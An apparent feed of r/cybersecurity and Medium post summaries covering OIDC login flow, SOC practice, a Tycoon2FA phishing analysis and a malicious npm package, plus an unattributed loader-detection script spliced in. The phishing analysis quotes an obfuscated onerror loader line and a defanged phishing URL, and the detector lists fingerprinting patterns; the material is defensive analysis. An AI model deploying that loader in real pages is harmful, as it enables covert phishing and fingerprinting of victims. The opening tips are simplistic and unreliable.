Cybersecurity is often thought of as a complex and technical field, but there are actually many simple things that everyone can do to help stay safe online. For example, one way to protect your online communications is to use PGP encryption. This type of encryption is incredibly difficult for even the most skilled hacker to break, but it’s also easy to use. Another way to improve your cybersecurity is to use very long passwords that are actually a sentence. This may seem daunting, but using a phrase as your password makes it much harder for hackers to guess. Additionally, changing the default ports for certain services can help prevent unauthorized access. And finally, unplugging the ethernet cable when you’re not using it is a great way to physically block hackers from accessing your device. By following these simple tips, you can dramatically improve your cybersecurity and protect your privacy.
source: r/cybersecurity
Source: r/cybersecurity
- Tired of massive OSINT lists, so I built a tiny Chrome extension I actually use by /u/Senior_Guidance_9508 (cybersecurity) on April 24, 2025 at 2:41 am
I kept getting overwhelmed by massive OSINT lists full of tools I never actually use. So I built a Chrome extension that launches user search queries across a small set of common platforms — grouped by type (social, dev, creative, etc.) and defined in a YAML file. It works with full names, partial usernames, or guesses. You type once — it opens all the relevant tabs. Saves time, and prompts pivots you'd normally skip because of effort.
Pros: No backend. No tracking. No bloated UI. Just a flat launcher I use daily.
Cons: UK-skewed (my context), and assumes you’re logged into most platforms.
Find it on GitHub. Feedback welcome. Fork it or ignore it — it’s already more useful than 90% of my bookmarks.
- Cybersecurity Podcast for SMBs with actionable insights? by /u/tekybala (cybersecurity) on April 24, 2025 at 12:25 am
If there is a cybersecurity podcast focusing SMBs with actionable insights, recommending open source and free solutions for security controls, playbook templates, tabletop exercises, would you be interested to listen?
- Is this just how blue teams work or is this a red flag environment? by /u/National-Serve-5041 (cybersecurity) on April 23, 2025 at 11:38 pm
I'm in a junior security role (intern level), and I’ve been questioning whether what I’m seeing is just normal growing pains in SOC life—or signs of a low-maturity, stagnant team. I'd love to hear what others think or what you've experienced at different orgs.
Things that feel off to me:
1. Alerting & Detection Logic
A lot of our detections are straight from vendor blogs or community GitHub pages, slapped into the SIEM without much thought. When they’re noisy, the fix is usually to just tack on string exclusions instead of understanding the source of the noise. We end up with brittle, bloated queries that kind of work, but aren’t explainable or maintainable. No one ever really walks through the detection logic like “this is what this alert is trying to catch and why.”
2. Overreliance on Public Hash Reputation
There’s a habit of deciding whether a file is malicious just by checking its hash against public threat intel tools. If the hash comes out clean, that’s the end of the investigation—even if the file itself is something that obviously warrants deeper inspection. I’ve seen exclusions get added just because a hash had no flags, without understanding what the file actually does. For example a mingw32 compiler binary with a note saying "Hash checks come clean" like duh.
3. Weak EDR Usage & Case Management
Our EDR tool is decent, but it’s treated like a black box that runs itself. Cases get closed with a one-liner pasted from a .txt file, no assigned severity, no triage notes, no tagging. The case states are barely used—it just goes from “unresolved” to “resolved,” skipping the whole investigation phase. It feels like we’re just going through the motions.
4. Strange Detection Philosophy
There's a focus on detecting strings, filenames, or task names seen in prior malware samples instead of focusing on how an action was done. Example: scheduled tasks are flagged based on name lists, not behavior. When I brought up ideas like looking for schtasks being spawned by odd parent processes or in strange directories, it was kind of nodded at—but then dropped.
5. No Real Engineering or Automation
This one might bug me the most. There’s very little scripting or tooling being built internally. Everything is done manually—even repeatable tasks. I’ve dreamed of working on a team where people are like “Hey, I saw you struggling with that—here’s a script I made to do that in one line.” But here, no one builds that. No internal helpers. No automation to speak of, even for simple stuff like case note templates, IOC enrichment, or sandboxing integrations.
6. Lack of Curiosity / Deep Dive Culture
When I try to bring up deeper concepts—like file header tampering, non-static indicators, or real-world evasions—I feel like I’m being seen as the “paranoid intern” who read too many threat reports. There’s little interest in reverse engineering or maldev techniques unless it’s something the vendor already wrote a blog post on.
What I'm wondering:
- Is this kind of team environment common?
- How do I avoid landing in places like this in the future?
- Are there red flags I can watch for during interviews?
- Am I expecting too much from blue teams? I thought we were supposed to dig deep, build tools, and iterate on detections—not just patch alerts with string filters.
Would love to hear from anyone who's seen both low and high-maturity SOCs—what does a good one feel like?
- New Scanner Tool for AI Code Editors by /u/AlternativeQuick4888 (cybersecurity) on April 23, 2025 at 11:33 pm
Built a static scanner that combines a bunch of open source tools and produces a file for AI Code Editors/IDEs to easily read. I'd love some feedback from the community! https://github.com/AdarshB7/patcha-engine I think a tool like this can help a lot of people and am actively refining it to do so. Any help on the journey would be greatly appreciated.
- Looking for honest feedback from cybersecurity pros: Early access to a European-built exposure discovery tool by /u/Mattpeeters (cybersecurity) on April 23, 2025 at 10:35 pm
Hi all, I’m a founder (based in Europe) working on a new project to help organizations identify what assets — domains, cloud services, servers, etc.— are unintentionally exposed online. The tool is designed to be much simpler and more accessible than most enterprise solutions, with a focus on smaller teams and companies. I’m at the stage where real-world feedback is much more valuable than coding in a vacuum. If you work in IT, security or just enjoy testing new tools, I’d love to invite you to try it out and share your honest thoughts. No pitch, no spam, just actual user feedback to help shape the product. If this sounds interesting, please DM me and I’ll share early access details. Thanks a lot — and if this kind of post isn’t allowed, let me know and I’ll take it down.
- Securing Legacy Systems and Protocols by /u/FluffyDontNut (cybersecurity) on April 23, 2025 at 9:20 pm
For those who have or are working in environments that have legacy systems or protocols (NetBios, SMB1, etc), what use cases do you have in place to detect suspicious activity? Or what would you recommend putting into place if the environment can't be cleaned up?
- Google has confirmed a sophisticated phishing attack by /u/Positive-Share-8742 (cybersecurity) on April 23, 2025 at 8:17 pm
https://www.dailymail.co.uk/sciencetech/article-14631849/warning-google-gmail-users-attack-personal-information.html
- As told be a CISO - how an AI SOC solution actually augments/uplevels entry level analysts by /u/ProphetSecurity (cybersecurity) on April 23, 2025 at 6:34 pm
I know Redditors don't like vendor pitches disguised as helpful content. Don't want to promote anything in particular besides a single message. Skip to 2:23-mark to hear a CISO who has every reason to cut costs through AI (in the home building industry at a time where buying/remodeling homes has taken a big hit) talk about how he's using an AI SOC tool to do the opposite, hire and train an employee https://youtu.be/Kftlx75EThc?si=hWcJcX2Ii8CQRsqc&t=144 Only time will tell the full impact of AI, but at least if humans continue to use AI responsibly, good things can happen
edit: "by a CISO" [facepalm]
- Verizon's 2025 DBIR is out! by /u/ticats88 (cybersecurity) on April 23, 2025 at 5:04 pm
I know it's a corporate report & all, but I still look forward to this every year. It's got a huge scope of data breaches underlying it that leads to some interesting findings. I really like the industry specific breakdowns as well. Hope this is of some use to y'all. Take care 🙂
- Quorantine: The Digital Danger Zone by Paul Thomas (Cybersecurity on Medium) on April 23, 2025 at 5:01 pm
Have you ever imagined your entire identity — your name, your birthday, your home address — typed out and posted online like a blog entry…
- Cryptography: by Saikiran N (Cybersecurity on Medium) on April 23, 2025 at 5:00 pm
Cryptography is the science of securing information, ensuring that data remains confidential, unaltered, and authentic.
- "I am thrilled to announce that I have successfully completed my first AICWSA (Armour Infosec… by Aman patel (Cybersecurity on Medium) on April 23, 2025 at 4:59 pm
- How It Feels When Your Script Actually Works on First Try by Vijay Kumar Gupta (Cybersecurity on Medium) on April 23, 2025 at 4:57 pm
Prologue: The Eternal Struggle of the Cyber Knight
- STRIDE: Threat Modeling and Secure Application Guide by Musa ATALAY (Cybersecurity on Medium) on April 23, 2025 at 4:56 pm
Threat modeling is usually seen as a complex practice reserved for security experts. But this perception is misleading. Threat…
- Don’t Just Disconnect — Why Signing Out of Servers Matters by Josiah Coffey (Security on Medium) on April 23, 2025 at 4:52 pm
If you work in IT or manage infrastructure, you’ve probably done this before: you’re finished working on a server via Remote Desktop, so…
- How does OIDC work: ELI5 by /u/trolleid (cybersecurity) on April 23, 2025 at 4:49 pm
Similar to my last post, I was reading a lot about OIDC and created this explanation. It's a mix of the best resources I have found with some additions and a lot of rewriting. I have added a super short summary and a code example at the end. Maybe it helps one of you 🙂 This is the repo.

OIDC Explained

Let's say John is on LinkedIn and clicks 'Login with Google'. He is now logged in without LinkedIn knowing his password or any other sensitive data. Great! But how did that work?

Via OpenID Connect (OIDC). This protocol builds on OAuth 2.0 and is the answer to the above question.

I will provide a super short and simple summary, a more detailed one and even a code snippet. You should know what OAuth and JWTs are because OIDC builds on them. If you're not familiar with OAuth, see my other guide here.

Super Short Summary

1. John clicks 'Login with Google'
2. Now the usual OAuth process takes place
   - John authorizes us to get data about his Google profile
   - E.g. his email, profile picture, name and user id
3. Important: Now Google not only sends LinkedIn the access token as specified in OAuth, but also a JWT.
4. LinkedIn uses the JWT for authentication in the usual way
   - E.g. John's browser saves the JWT in the cookies and sends it along every request he makes
   - LinkedIn receives the token, verifies it, and sees "ah, this is indeed John"

More Detailed Summary

Suppose LinkedIn wants users to log in with their Google account to authenticate and retrieve profile info (e.g., name, email).

1. LinkedIn sets up a Google API account and receives a client_id and a client_secret
   - So Google knows this client id is LinkedIn
2. John clicks 'Log in with Google' on LinkedIn.
3. LinkedIn redirects to Google’s OIDC authorization endpoint: https://accounts.google.com/o/oauth2/auth?client_id=...&redirect_uri=...&scope=openid%20profile%20email&response_type=code
   - As you see, LinkedIn passes client_id, redirect_uri, scope and response_type as URL params
   - Important: scope must include openid
   - profile and email are optional but commonly used
   - redirect_uri is where Google sends the response.
4. John logs into Google
5. Google asks: 'LinkedIn wants to access your Google Account', John clicks 'Allow'
6. Google redirects to the specified redirect_uri with a one-time authorization code. For example: https://linkedin.com/oidc/callback?code=one_time_code_xyz
7. LinkedIn makes a server-to-server request to Google
   - It passes the one-time code, client_id, and client_secret in the request body
8. Google responds with an access token and a JWT
9. Finished. LinkedIn now uses the JWT for authentication and can use the access token to get more info about John's Google account

Question: Why not already send the JWT and access token in step 6?

Answer: To make sure that the requester is actually LinkedIn. So far, all requests to Google have come from the user's browser, with only the client_id identifying LinkedIn. Since the client_id isn't secret and could be guessed by an attacker, Google can't know for sure that it's actually LinkedIn behind this.

Authorization servers (Google in this example) use predefined URIs. So LinkedIn needs to specify predefined URIs when setting up their Google API. And if the given redirect_uri is not among the predefined ones, then Google rejects the request. See here: https://datatracker.ietf.org/doc/html/rfc6749#section-3.1.2.2

Additionally, LinkedIn includes the client_secret in the server-to-server request. This, however, is mainly intended to protect against the case that an attacker somehow intercepted the one-time code, so he can't use it.

Addendum

- In step 8 LinkedIn also verifies the JWT's signature and claims. Usually in OIDC we use asymmetric encryption (Google does for example) to sign the JWT. The advantage of asymmetric encryption is that the JWT can be verified by anyone by using the public key, including LinkedIn.
- Ideally, Google also returns a refresh token. The JWT will work as long as it's valid, for example hasn't expired. After that, the user will need to redo the above process.
- The public keys are usually specified at the JSON Web Key Sets (JWKS) endpoint.

Key Additions to OAuth 2.0

As we saw, OIDC extends OAuth 2.0. This guide is incomplete, so here are just a few of the additions that I consider key additions.

ID Token

The ID token is the JWT. It contains user identity data (e.g., sub for user ID, name, email). It's signed by the IdP (Identity provider, in our case Google) and verified by the client (in our case LinkedIn). The JWT is used for authentication. Hence, while OAuth is for authorization, OIDC is authentication.

Don't confuse Access Token and ID Token:
- Access Token: Used to call Google APIs (e.g. to get more info about the user)
- ID Token: Used purely for authentication (so we know the user actually is John)

Discovery Document

OIDC providers like Google publish a JSON configuration at a standard URL: https://accounts.google.com/.well-known/openid-configuration

This lists endpoints (e.g., authorization, token, UserInfo, JWKS) and supported features (e.g., scopes). LinkedIn can fetch this dynamically to set up OIDC without hardcoding URLs.

UserInfo Endpoint

OIDC standardizes a UserInfo endpoint (e.g., https://openidconnect.googleapis.com/v1/userinfo). LinkedIn can use the access token to fetch additional user data (e.g., name, picture), ensuring consistency across providers.

Nonce

To prevent replay attacks, LinkedIn includes a random nonce in the authorization request. Google embeds it in the ID token, and LinkedIn checks it matches during verification.

Security Notes

- HTTPS: OIDC requires HTTPS for secure token transmission.
- State Parameter: Inherited from OAuth 2.0, it prevents CSRF attacks.
- JWT Verification: LinkedIn must validate JWT claims (e.g., iss, aud, exp, nonce) to ensure security.

Code Example

Below is a standalone Node.js example using Express to handle OIDC login with Google, storing user data in a SQLite database. Please note that this is just example code and some things are missing or can be improved.

I also on purpose did not use the library openid-client so less things happen "behind the scenes" and the entire process is more visible. In production you would want to use openid-client or a similar library.

Last note, I also don't enforce HTTPS here, which in production you really really should.

```javascript
const express = require("express");
const axios = require("axios");
const sqlite3 = require("sqlite3").verbose();
const crypto = require("crypto");
const jwt = require("jsonwebtoken");
const session = require("express-session");
const jwkToPem = require("jwk-to-pem");

const app = express();
const db = new sqlite3.Database(":memory:");

// Configure session middleware
app.use(
  session({
    secret: process.env.SESSION_SECRET || "oidc-example-secret",
    resave: false,
    saveUninitialized: true,
  })
);

// Initialize database
db.serialize(() => {
  db.run(
    "CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, email TEXT)"
  );
  db.run(
    "CREATE TABLE federated_credentials (user_id INTEGER, provider TEXT, subject TEXT, PRIMARY KEY (provider, subject))"
  );
});

// Configuration
const CLIENT_ID = process.env.OIDC_CLIENT_ID;
const CLIENT_SECRET = process.env.OIDC_CLIENT_SECRET;
const REDIRECT_URI = "https://example.com/oidc/callback";
const ISSUER_URL = "https://accounts.google.com";

// OIDC discovery endpoints cache
let oidcConfig = null;

// Function to fetch OIDC configuration from the discovery endpoint
async function fetchOIDCConfiguration() {
  if (oidcConfig) return oidcConfig;

  try {
    const response = await axios.get(
      `${ISSUER_URL}/.well-known/openid-configuration`
    );
    oidcConfig = response.data;
    return oidcConfig;
  } catch (error) {
    console.error("Failed to fetch OIDC configuration:", error);
    throw error;
  }
}

// Function to generate and verify PKCE challenge
function generatePKCE() {
  // Generate code verifier
  const codeVerifier = crypto.randomBytes(32).toString("base64url");

  // Generate code challenge (SHA256 hash of verifier, base64url encoded)
  const codeChallenge = crypto
    .createHash("sha256")
    .update(codeVerifier)
    .digest("base64")
    .replace(/\+/g, "-")
    .replace(/\//g, "_")
    .replace(/=/g, "");

  return { codeVerifier, codeChallenge };
}

// Function to fetch JWKS
async function fetchJWKS() {
  const config = await fetchOIDCConfiguration();
  const response = await axios.get(config.jwks_uri);
  return response.data.keys;
}

// Function to verify ID token
async function verifyIdToken(idToken) {
  // First, decode the header without verification to get the key ID (kid)
  const header = JSON.parse(
    Buffer.from(idToken.split(".")[0], "base64url").toString()
  );

  // Fetch JWKS and find the correct key
  const jwks = await fetchJWKS();
  const signingKey = jwks.find((key) => key.kid === header.kid);

  if (!signingKey) {
    throw new Error("Unable to find signing key");
  }

  // Format key for JWT verification
  const publicKey = jwkToPem(signingKey);

  return new Promise((resolve, reject) => {
    jwt.verify(
      idToken,
      publicKey,
      {
        algorithms: [signingKey.alg],
        audience: CLIENT_ID,
        issuer: ISSUER_URL,
      },
      (err, decoded) => {
        if (err) return reject(err);
        resolve(decoded);
      }
    );
  });
}

// OIDC login route
app.get("/login", async (req, res) => {
  try {
    // Fetch OIDC configuration
    const config = await fetchOIDCConfiguration();

    // Generate state for CSRF protection
    const state = crypto.randomBytes(16).toString("hex");
    req.session.state = state;

    // Generate nonce for replay protection
    const nonce = crypto.randomBytes(16).toString("hex");
    req.session.nonce = nonce;

    // Generate PKCE code verifier and challenge
    const { codeVerifier, codeChallenge } = generatePKCE();
    req.session.codeVerifier = codeVerifier;

    // Build authorization URL
    const authUrl = new URL(config.authorization_endpoint);
    authUrl.searchParams.append("client_id", CLIENT_ID);
    authUrl.searchParams.append("redirect_uri", REDIRECT_URI);
    authUrl.searchParams.append("response_type", "code");
    authUrl.searchParams.append("scope", "openid profile email");
    authUrl.searchParams.append("state", state);
    authUrl.searchParams.append("nonce", nonce);
    authUrl.searchParams.append("code_challenge", codeChallenge);
    authUrl.searchParams.append("code_challenge_method", "S256");

    res.redirect(authUrl.toString());
  } catch (error) {
    console.error("Login initialization error:", error);
    res.status(500).send("Failed to initialize login");
  }
});

// OIDC callback route
app.get("/oidc/callback", async (req, res) => {
  const { code, state } = req.query;
  const { codeVerifier, state: storedState, nonce: storedNonce } = req.session;

  // Verify state
  if (state !== storedState) {
    return res.status(403).send("Invalid state parameter");
  }

  try {
    // Fetch OIDC configuration
    const config = await fetchOIDCConfiguration();

    // Exchange code for tokens
    const tokenResponse = await axios.post(
      config.token_endpoint,
      new URLSearchParams({
        grant_type: "authorization_code",
        client_id: CLIENT_ID,
        client_secret: CLIENT_SECRET,
        code,
        redirect_uri: REDIRECT_URI,
        code_verifier: codeVerifier,
      }),
      {
        headers: {
          "Content-Type": "application/x-www-form-urlencoded",
        },
      }
    );

    const { id_token, access_token } = tokenResponse.data;

    // Verify ID token
    const claims = await verifyIdToken(id_token);

    // Verify nonce
    if (claims.nonce !== storedNonce) {
      return res.status(403).send("Invalid nonce");
    }

    // Extract user info from ID token
    const { sub: subject, name, email } = claims;

    // If we need more user info, we can fetch it from the userinfo endpoint
    // const userInfoResponse = await axios.get(config.userinfo_endpoint, {
    //   headers: { Authorization: `Bearer ${access_token}` }
    // });
    // const userInfo = userInfoResponse.data;

    // Check if user exists in federated_credentials
    db.get(
      "SELECT * FROM federated_credentials WHERE provider = ? AND subject = ?",
      [ISSUER_URL, subject],
      (err, cred) => {
        if (err) return res.status(500).send("Database error");

        if (!cred) {
          // New user: create account
          db.run(
            "INSERT INTO users (name, email) VALUES (?, ?)",
            [name, email],
            function (err) {
              if (err) return res.status(500).send("Database error");

              const userId = this.lastID;
              db.run(
                "INSERT INTO federated_credentials (user_id, provider, subject) VALUES (?, ?, ?)",
                [userId, ISSUER_URL, subject],
                (err) => {
                  if (err) return res.status(500).send("Database error");

                  // Store user info in session
                  req.session.user = { id: userId, name, email };
                  res.send(`Logged in as ${name} (${email})`);
                }
              );
            }
          );
        } else {
          // Existing user: fetch and log in
          db.get(
            "SELECT * FROM users WHERE id = ?",
            [cred.user_id],
            (err, user) => {
              if (err || !user) return res.status(500).send("Database error");

              // Store user info in session
              req.session.user = {
                id: user.id,
                name: user.name,
                email: user.email,
              };
              res.send(`Logged in as ${user.name} (${user.email})`);
            }
          );
        }
      }
    );
  } catch (error) {
    console.error("OIDC callback error:", error);
    res.status(500).send("OIDC authentication error");
  }
});

// User info endpoint (requires authentication)
app.get("/userinfo", (req, res) => {
  if (!req.session.user) {
    return res.status(401).send("Not authenticated");
  }
  res.json(req.session.user);
});

// Logout endpoint
app.get("/logout", async (req, res) => {
  try {
    // Fetch OIDC configuration to get end session endpoint
    const config = await fetchOIDCConfiguration();
    let logoutUrl;

    if (config.end_session_endpoint) {
      logoutUrl = new URL(config.end_session_endpoint);
      logoutUrl.searchParams.append("client_id", CLIENT_ID);
      logoutUrl.searchParams.append(
        "post_logout_redirect_uri",
        "https://example.com"
      );
    }

    // Clear the session
    req.session.destroy(() => {
      if (logoutUrl) {
        res.redirect(logoutUrl.toString());
      } else {
        res.redirect("/");
      }
    });
  } catch (error) {
    console.error("Logout error:", error);

    // Even if there's an error fetching the config,
    // still clear the session and redirect
    req.session.destroy(() => {
      res.redirect("/");
    });
  }
});

app.listen(3000, () => console.log("Server running on port 3000"));
```

License

MIT
- Cybersecurity for Seniors: Navigating the Internet with Confidence by E. Ibrahimi (Cybersecurity on Medium) on April 23, 2025 at 4:48 pm
An Easy-to-Follow Guide to Online Security. Continue reading on MeetCyber »
- Defending AI on Oracle Cloud Infrastructure: A Technical Incident Response Playbook Using Oracle… by Scarlett Danger (Cybersecurity on Medium) on April 23, 2025 at 4:41 pm
AI workloads on Oracle Cloud Infrastructure (OCI) are increasingly targeted by sophisticated attacks such as prompt injection, model… Continue reading on Medium »
- Wireshark: The Basics | THM by Isiah Johnstone (Cybersecurity on Medium) on April 23, 2025 at 4:35 pm
This is a walkthrough of Wireshark: The Basics from TryHackMe. Continue reading on Medium »
- WhatsApp for Windows flaw (CVE-2025-30401) allowed remote code execution via spoofed files by /u/bytelocksolutions (cybersecurity) on April 23, 2025 at 4:11 pm
Meta recently patched a high-severity vulnerability in WhatsApp for Windows (CVE-2025-30401) that allowed attackers to execute malicious code on a target’s machine by sending spoofed file types. The exploit didn’t require the user to do anything beyond opening what looked like a harmless file. This makes it particularly dangerous for less tech-savvy users and internal teams not trained in threat detection.
What is known:
  - Affected all WhatsApp for Windows versions prior to 2.2450.6
  - Exploited using specially crafted files with manipulated extensions
  - Meta confirmed active exploitation before the patch was issued
It’s a reminder that even popular desktop apps can become threat vectors when spoofing and user trust intersect. Were you or someone you know affected by this? Or have you seen this exploited in the wild in an org you work with?
- Enforcing DB Level Multi-Tenancy Using PostgreSQL Row Level Security by Muhammed Said Kaya (Security on Medium) on April 23, 2025 at 3:42 pm
Multi-tenancy is a core requirement in SAAS applications. Each customer (tenant) should only access their own data — and the best way to… Continue reading on Picus Security Engineering »
- Shifting Priorities: The Rise of Securitized Development in International Aid by Şule Ekinci (Security on Medium) on April 23, 2025 at 3:35 pm
“We will not enjoy security without development, we will not enjoy development without security, and we will not enjoy without respect for… Continue reading on Medium »
- AI Agents: AresGPT + Topical Authority Advisor’s Red Teaming Intelligence SEO by Adam M. Victor | Author | A.I. Ethics (Security on Medium) on April 23, 2025 at 3:35 pm
The Rise of Ethical AI Intelligence in Digital Strategy. Continue reading on Medium »
- Phishing-Style Link Reflected on Microsoft Azure Portal — Not XSS, But Still Tricky by Ahmed AbdElmaqsoud (Security on Medium) on April 23, 2025 at 2:54 pm
🧭 A Quick Background. Continue reading on Medium »
- Top 10 Ways to Protect Your MERN Application Like a Pro by Shanmuga priya (Security on Medium) on April 23, 2025 at 2:51 pm
A comprehensive beginner-friendly guide on securing the MERN apps from vulnerabilities and attacks. Continue reading on Code Like A Girl »
- Anyone actually efficiently managing all the appsec issues coming via the pipelines? by /u/Major_Ideal1453 (cybersecurity) on April 23, 2025 at 2:44 pm
There’s so much noise from SAST, DAST, SCA, bug bounty, etc. Is anyone actually aggregating it all somewhere useful? Or are we all still stuck in spreadsheets and Jira hell? What actually works for your team (or doesn’t)? Curious to hear what setups people have landed on.
- Pipask: Know What You’re Installing Before It’s Too Late by Jan Michelfeit (Security on Medium) on April 23, 2025 at 2:41 pm
A safer way to install Python packages without compromising convenience (or losing your Bitcoin). Continue reading on Data Science Collective »
- Michael Yonesi shares his Top 5 Cybersecurity Tips You Can’t Afford to Ignore by Michael Younsi (Security on Medium) on April 23, 2025 at 2:05 pm
In a digital era dominated by rapid innovation, cybersecurity isn’t just a best practice — it’s survival. Michael Yonesi, a cybersecurity… Continue reading on Medium »
- MCP: The USB-C of AI, or a New Security Nightmare? by yiğit faruk demir (Security on Medium) on April 23, 2025 at 1:45 pm
One of the most talked-about topics in the AI world right now: the Model Context Protocol (MCP) developed by Anthropic. This new… Continue reading on Medium »
- MFA Authentication method added for multiple accounts by /u/Yae-ger (cybersecurity) on April 23, 2025 at 1:42 pm
Hey folks, A few days back, I observed something odd at work and wondered if anyone (especially MSFT/Entra ID experts) could help me figure it out because our IAM SME was lost.
Our MDR sent an alert about a Suspicious email addition to one of our accounts. Seconds later, they let us know that the same email address was added to 500 different accounts as an MFA email authentication method, which makes me believe someone is looking for persistence in our environment. The email address added does not belong to our domain, and of course, no one recognizes it.
The audit logs say the email address was added by "Azure Credential Configuration Endpoint Service," which, from the few things I read on the internet, seems a legitimate MSFT service. I believe this was done leveraging a misconfiguration in our environment, abusing a legitimate service but I'm not sure which one or where to look.
I feel that Conditional Access Policies (CAP) might help here but I'm wondering where's the hole that I need to patch to prevent this. Any help will be duly appreciated.
- Released: MITRE ATT&CK v17.0, now with ESXi attack TTPs by /u/tekz (cybersecurity) on April 23, 2025 at 1:06 pm
- Fingerprinted & Matched: How Tycoon2FA Phishing Chooses Its Victims by /u/ANYRUN-team (cybersecurity) on April 23, 2025 at 11:41 am
This phishing technique uses system fingerprinting and geolocation to selectively deliver malicious content. In this case, the phishing page loads only for victims in Argentina, Brazil, and the Middle East, as observed during analysis in ANYRUN Sandbox.
Execution chain: HTML → Hidden IMG → data-digest → OnError → B64 decode → Fingerprint → POST → Geolocation match → Conditional redirect (non-matching users sent to Tesla or Emirates) → Tycoon2FA
Here’s how it works:
New domains registered via “Squarespace Domains” and hosted on ASN “AS-CHOOPA”. When visited, these domains immediately forward the user to well-known sites like Tesla, Emirates or SpaceX.
Analysis: https://app.any.run/browses/d9b4ca48-5226-43c1-8232-40d51d37ec8e/
Right before a redirect, a hidden “img” tag is injected. Because the image doesn't exist, the onerror event is triggered:
onerror="(new Function(atob(this.dataset.digest)))();"
The event runs a fingerprinting script that collects:
  – Screen resolution, color depth, etc.
  – User agent, platform details, plugins
  – User’s local timezone offset
  – GPU vendor and renderer via WebGL
A fingerprinting script in CyberChef
Finally, an invisible form sends the collected data to the server via POST.
If your fingerprint matches:
  – UTC-3 (Argentina, Brazil)
  – UTC+2 to +4 (UAE, etc.)
The server responds with a Location header pointing to the phishing page: hxxps://zkw[.]idrvlqvkov[.]es/dGeaU/
See example: https://app.any.run/tasks/7c54c46d-285f-491c-ab50-6de1b7d3b376/
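For triage of saved pages, the loader pattern quoted in the post above (an event handler that runs base64 text held in a data-* attribute) can be found statically. This is an added example, not code from the post or from ANY.RUN; the function name, hint list and sample HTML are constructed for illustration, and the payload is decoded for review, never executed.

```javascript
// Hints for the data points the post says the fingerprinting script collects.
const FINGERPRINT_HINTS = {
  screen: /\bscreen\.(width|height|colorDepth)\b/,
  userAgent: /\bnavigator\.(userAgent|platform|plugins)\b/,
  timezone: /getTimezoneOffset\s*\(/,
  webglGpu: /WEBGL_debug_renderer_info|UNMASKED_(VENDOR|RENDERER)_WEBGL/,
};

const TAG_RE = /<([a-z][a-z0-9]*)\b((?:"[^"]*"|'[^']*'|[^>"'])*)>/gi;
const ATTR_RE = /([^\s"'<>\/=]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
const EVAL_RE = /\b(?:Function|eval)\s*\(/;
const ATOB_RE = /\batob\s*\(/;
const DATASET_RE = /\bdataset\s*(?:\.\s*([A-Za-z_$][\w$]*)|\[\s*["']([^"']+)["']\s*\])/;

// Return one finding per event handler that evaluates base64 from a data-* attribute.
function findDatasetLoaders(html) {
  const findings = [];
  for (const tagMatch of html.matchAll(TAG_RE)) {
    const attrs = {};
    for (const a of tagMatch[2].matchAll(ATTR_RE)) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? "";
    }
    for (const [name, handler] of Object.entries(attrs)) {
      if (!name.startsWith("on")) continue;
      const ref = DATASET_RE.exec(handler);
      if (!ref || !EVAL_RE.test(handler) || !ATOB_RE.test(handler)) continue;
      // dataset.fooBar maps to the attribute data-foo-bar.
      const dataAttr =
        "data-" + (ref[1] || ref[2]).replace(/[A-Z]/g, (c) => "-" + c.toLowerCase());
      const encoded = attrs[dataAttr];
      if (encoded === undefined) continue;
      // Decode only; the text is inspected, not run.
      const decoded = Buffer.from(encoded, "base64").toString("utf8");
      const hints = Object.keys(FINGERPRINT_HINTS).filter((k) =>
        FINGERPRINT_HINTS[k].test(decoded)
      );
      findings.push({ tag: tagMatch[1].toLowerCase(), event: name, dataAttr, decoded, hints });
    }
  }
  return findings;
}

// Constructed sample: inert text standing in for a decoded script.
const SAMPLE_PAYLOAD =
  "var fp=[screen.width,screen.colorDepth,new Date().getTimezoneOffset()];" +
  "var ext='WEBGL_debug_renderer_info';";

// Constructed sample page: one ordinary image fallback, one loader of the quoted shape.
const SAMPLE_HTML = [
  '<img src="logo.png" onerror="this.src=\'fallback.png\'">',
  '<img src="missing.png" style="display:none" data-digest="' +
    Buffer.from(SAMPLE_PAYLOAD).toString("base64") +
    '" onerror="(new Function(atob(this.dataset.digest)))();">',
].join("\n");

for (const f of findDatasetLoaders(SAMPLE_HTML)) {
  console.log(`<${f.tag}> ${f.event} evaluates ${f.dataAttr}; hints: ${f.hints.join(", ")}`);
}
```

The ordinary `onerror` image fallback in the sample is not reported, because its handler neither decodes nor evaluates anything.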
- Malicious npm Package Impersonating Popular Express Cookie Parser by /u/N1ghtCod3r (cybersecurity) on April 23, 2025 at 10:16 am
Here is a malicious npm package that DOES NOT trigger on installation. express-cookie-parser impersonates the popular npm package cookie-parser. But instead of dropping the payload during npm install like almost all other known malicious samples, it maintains API compatibility with the original cookie-parser package and drops the payload when the affected application loads this package using its exported API.
Interesting behaviour that we observed:
  - DGA to generate C2 domain using SHA256 hash & key
  - Self-delete, including removing reference from original index.js
The core payload is conventional, i.e. downloads a startup.js from C2 URL, drops it into Google Chrome's user data directory and executes using Node executable in path.
- Do you look at what security solutions that tech companies are building and compete with them to see who have state of the art? by /u/ConstructionSome9015 (cybersecurity) on April 23, 2025 at 8:04 am
There's lots of competition between the security teams to show who is smart.
- NVD / EUVD - EU CVE database announced and LIVE by /u/No-Key667 (cybersecurity) on April 23, 2025 at 5:39 am
The decentralization of such an important pillar of Cybersecurity is great news. Many of us saw this coming since the NIS2 directive was announced in EU. The website is still beta, and the API implementation is on its way. As they said, the idea is to integrate with the existing NVD established practices:
  - Each vulnerability gets a unique EUVD ID (EUVD-2021-12345)
  - Cross-references with existing CVEs
  - Vulnerabilities are scored using CVSS
  - Includes vulnerabilities reported by the CSIRT network, strengthening accuracy and relevance.
EU Vulnerability Database from (ENISA)
Update from EUVD FAQ #1 and #4, it leverages on https://github.com/vulnerability-lookup/vulnerability-lookup
- Does your phone eavesdrop to target ads? A Samsung engineer and Korean regulators weigh in by /u/Particular-Novel4963 (cybersecurity) on April 23, 2025 at 5:27 am
- What are some things you share in your SOC meetings? by /u/Full-Bullfrog4707 (cybersecurity) on April 23, 2025 at 1:09 am
I recently joined as a SOC analyst and we have a 30-min meeting every fortnight, but we still don’t have anything to share. We’re just a team of 3 (manager, me and one more analyst). So wondering, what do you guys normally do?
- How do you get over the guilt of a breach? by /u/BillSecurityGuy (cybersecurity) on April 22, 2025 at 9:24 pm
